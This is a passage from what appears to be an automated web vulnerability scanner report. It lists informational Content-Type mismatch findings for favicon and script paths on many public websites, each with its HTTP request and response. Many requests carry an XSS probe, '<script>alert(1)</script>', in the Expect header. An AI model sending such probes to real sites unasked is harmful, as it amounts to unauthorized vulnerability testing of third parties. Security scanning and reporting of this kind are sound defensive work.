The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.42. http://www.craigslist.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.craigslist.com.au
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslist.com.au
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Mon, 23 Jun 2008 23:06:11 GMT
Cache-Control: public, max-age=315360000
Accept-Ranges: bytes
Date: Fri, 10 Dec 2010 20:14:23 GMT
Vary: Accept-Encoding
Content-Length: 1150
Content-Type: text/plain
Server: Apache
Expires: Mon, 07 Dec 2020 20:14:23 GMT

............ .h.......(....... ..... ...........................................]2..]...]...]...]...]...]...]2..........................]
..]...]...]...]...]...]...]...]...]...]...]
..............]
..
...[SNIP]...

18.43. http://www.craigslist.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.craigslist.de
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslist.de
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

18.44. http://www.custom404error.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.custom404error.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.45. http://www.dailystrength.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dailystrength.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailystrength.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat) mod_ssl/2.2.3 OpenSSL/0.9.8b PHP/5.2.9
Last-Modified: Tue, 09 Dec 2008 21:35:36 GMT
ETag: "1980c2e-37e-45da3ec847a00"
Content-Type: text/plain; charset=UTF-8
Expires: Fri, 01 Apr 2011 16:24:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 16:24:31 GMT
Content-Length: 894
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

18.46. http://www.dailytech.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dailytech.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.47. http://www.dealio.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dealio.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealio.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 15:44:37 GMT
Server:
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

Expectation Failed"

18.48. http://www.deltadental.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.deltadental.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.deltadental.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 15:46:29 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.5 mod_ssl/2.8.13 OpenSSL/0.9.7a
Set-Cookie: server=02; path=/; domain=deltadental.com
Last-Modified: Tue, 16 Nov 2010 19:59:28 GMT
ETag: "10cd14-381e-4ce2e2a0"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 14366
Connection: Keep-alive
Via: 1.1 AN-0003011066774062

...... ..........V...00.... ..%..............(...............h..../.. ..........65..(... ...@...............................[.X._.].d.[.d.^.c.\.e.^.h._.f.].f._.^.`.\.`.^.b.\.b.^.b.^.e.\.e.].f._.f.^.
...[SNIP]...

18.49. http://www.diapers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.diapers.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.50. http://www.dinodirect.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dinodirect.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.51. http://www.directron.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.directron.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.directron.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:49:03 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

18.52. http://www.dltk-holidays.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dltk-holidays.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.53. http://www.fabsugar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fabsugar.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fabsugar.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 311
Date: Fri, 01 Apr 2011 17:06:42 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%.q...w....R.$.....**...o..5..I ...X.^P...
L@".h..PX../.......k....;.2..0`bbR........x..........4321:...\.....=s
...[SNIP]...

18.54. http://www.findstuff.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.findstuff.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findstuff.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 09 Dec 2010 23:38:19 GMT
ETag: "ab8036-47e-49702bb8ab0c0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=212417
Expires: Mon, 04 Apr 2011 03:21:44 GMT
Date: Fri, 01 Apr 2011 16:21:27 GMT
Connection: close

............ .h.......(....... ..... ........................................................bO...?..............................................Fi...6|..'s..'s..'s.....H..............................
...[SNIP]...

18.55. http://www.foodnetworkstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foodnetworkstore.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.56. http://www.frontdoor.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.frontdoor.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.57. http://www.genealogybank.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.genealogybank.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.genealogybank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 15:48:09 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
WWW-Authenticate: Basic realm="GenealogyBank"
Last-Modified: Wed, 27 Sep 2006 20:46:22 GMT
ETag: "1b2bf7-37e-451ae31e"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain

..............h.......(....... ...............H...H......................................................................................@.X8.H(.@H.P..............................`.x(.H8.P8.P8.X(.@...
...[SNIP]...

18.58. http://www.greatdreams.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.greatdreams.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatdreams.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 17:10:48 GMT
Server: Apache
Content-Length: 20
Content-Type: text/html; charset=iso-8859-1

Expect not supported

18.59. http://www.gsnrecipes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gsnrecipes.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 39
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 16:41:02 GMT
Connection: close

<h1>Bad Request (Invalid Hostname)</h1>

18.60. http://www.hometeamsonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.hometeamsonline.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.61. http://www.iforex.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.iforex.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.62. http://www.inforum.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.inforum.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inforum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 22 Nov 2010 15:11:18 GMT
Content-Type: text/plain; charset=UTF-8
Server: Apache/2.2.3 (CentOS)
ETag: "3e97fdc-13e-495a5ab01b180"
X-Cache-Lookup: HIT from sc1.fccinteractive.com:80
Cache-Control: max-age=300
Date: Fri, 01 Apr 2011 15:41:36 GMT
Content-Length: 318
Connection: close

..............(.......(....... ................................3.......f@...........`..@...sP..M .................Y0.................p...................@.. ....H.. ....C.. ....1.. ....... .....1. ..
...[SNIP]...

18.63. http://www.installiq.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.installiq.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

18.64. http://www.installiqlearnmore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.installiqlearnmore.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

18.65. http://www.insureme.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.insureme.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

18.66. http://www.interweave.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.interweave.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.67. http://www.jobappnetwork.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.jobappnetwork.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.68. http://www.jobvite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.jobvite.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.69. http://www.k12jobspot.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.k12jobspot.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.70. http://www.kitv.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kitv.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kitv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 05 Jun 2008 15:00:54 GMT
ETag: "4d5cdd-47e-9ca2b580"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain
Cache-Control: max-age=1781
Expires: Fri, 01 Apr 2011 16:26:45 GMT
Date: Fri, 01 Apr 2011 15:57:04 GMT
Connection: close

............ .h.......(....... ..... .........:...:...............................................................................................................p?7.j5-.l80.j7..|OF...................
...[SNIP]...

18.71. http://www.klm.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.klm.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.klm.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: text/plain
Last-Modified: Mon, 06 Mar 2006 11:30:28 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
Server: WebSEAL/6.0.0.3 (Build 060807)
Cache-Control: max-age=1800
Date: Fri, 01 Apr 2011 15:25:12 GMT
Connection: close
Vary: Accept-Encoding, User-Agent

..............(.......(....... .............................................s...V...+.......C..........................................................U6.sl........nA._./..DabS./.f"a..........!.......
...[SNIP]...

18.72. http://www.ksat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ksat.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ksat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 04 Feb 2008 23:52:33 GMT
ETag: "637282e-57e-d1531240"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain
Cache-Control: max-age=1766
Expires: Fri, 01 Apr 2011 16:50:50 GMT
Date: Fri, 01 Apr 2011 16:21:24 GMT
Connection: close

..............h.......(....... .................................... ......%!..$.... ..&'..#!..##.. $..**...1..-...02..77..=?..12..9;..:9..66..=?..8=..A>..EE..MN..EL..II..LL..MO..MQ..QV..ba..\\..VX..]]
...[SNIP]...

18.73. http://www.leapfish.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.leapfish.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.74. http://www.mail2web.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mail2web.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.75. http://www.maps.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.maps.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.76. http://www.mattel.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mattel.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mattel.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Mar 2011 23:39:25 GMT
ETag: "39d2e2-37e-49e8df03dc540"
Content-Length: 894
Content-Type: text/plain; charset=UTF-8
Content-Length: 894
X-Varnish: 424157933
Expires: Wed, 06 Apr 2011 22:28:38 GMT
Date: Fri, 01 Apr 2011 16:24:36 GMT
Connection: close

..............h.......(....... ...............#...#................................rk.tn..................................JG."..%..$.."..&..$..?<......................"..%..#..&..#..'..#..$..%..$.....
...[SNIP]...

18.77. http://www.meaning-of-names.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.meaning-of-names.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.78. http://www.melaleuca.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.melaleuca.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.79. http://www.mercantila-checkout.com/setcookie.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mercantila-checkout.com
Path:	/setcookie.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

18.80. http://www.mercantila.com/website/common/commonbroker.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mercantila.com
Path:	/website/common/commonbroker.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /website/common/commonbroker.php HTTP/1.1
Host: www.mercantila.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
Content-Length: 53
Origin: http://www.mercantila.com
X-Prototype-Version: 1.6.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mercServeBucket=merc-resources-gzip; mercServeCloud=dklnxffcpkmhm; PHPSESSID=1191364907574890868; merc_uid=6451364907577995808

UID=6451364907577995808&Action=setClickLogFromAjax&_=

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:01:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 92
Content-Type: text/html; charset=UTF-8

{"marr_data":true,"marr_request_param":null,"mint_status_code":1,"mstr_status_message":null}

18.81. http://www.mercantila.com/website/shoppingcart/cartbroker.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mercantila.com
Path:	/website/shoppingcart/cartbroker.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /website/shoppingcart/cartbroker.php HTTP/1.1
Host: www.mercantila.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
Content-Length: 22
Origin: http://www.mercantila.com
X-Prototype-Version: 1.6.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mercServeBucket=merc-resources-gzip; mercServeCloud=dklnxffcpkmhm; PHPSESSID=1191364907574890868; merc_uid=6451364907577995808; __utmz=1.1301677342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.940387525.1301677342.1301677342.1301677342.1; __utmc=1; __utmb=1.1.10.1301677342

Action=getCartCount&_=

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:01:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 105
Content-Type: text/html; charset=UTF-8

{"marr_data":"NO ITEM IN CART","marr_request_param":null,"mint_status_code":0,"mstr_status_message":null}

18.82. http://www.mirror.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mirror.co.uk
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mirror.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Last-Modified: Fri, 25 Jul 2008 09:51:04 GMT
X-serverID: 12
Content-Type: text/plain; charset=UTF-8
Content-Length: 1406
X-Cacheable: YES
X-Varnish: 1864019132 1864016462
X-Served-By: varnish-pxy-3
X-Cache-Hits: 9
Date: Fri, 01 Apr 2011 16:21:57 GMT
Connection: close

..............h.......(....... ...........@...........................UU.........."....w..33.............."...3"..DD..ff......................wf......................................"..."...""..""..3"
...[SNIP]...

18.83. http://www.ms.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ms.gov
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

content-type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ms.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 318
content-type: text/plain
date: Fri, 01 Apr 2011 16:17:19 GMT
last-modified: Wed, 29 Dec 2010 16:14:18 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=11DA85A60A0C1A16625A625A7171A8FA
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHbawrepnyqoMCPYo4LfJhMbVEvWvWLG+4yAr1zBA66GGTW6fxMP1tIz6+y+Y+wPBJpFhgfN376rwPIaJRHfBxGaqnx+PP+4qoU2K57cMqRTd

..............(.......(....... ...................................................................................................g......."&......ff....""fg....fffg....fffg....&ffg....&ffg....&fff....
...[SNIP]...

18.84. http://www.mt.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mt.gov
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mt.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

18.85. http://www.myhuckleberry.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.myhuckleberry.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

18.86. http://www.mysun.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mysun.co.uk
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mysun.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Date: Fri, 01 Apr 2011 16:38:28 GMT
Connection: close

..............h.......(....... ...............................3@......_j................................................................................................................................
...[SNIP]...

18.87. http://www.nairaland.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nairaland.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nairaland.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 01 Apr 2011 15:31:22 GMT
Content-Type: text/plain; charset=UTF-8
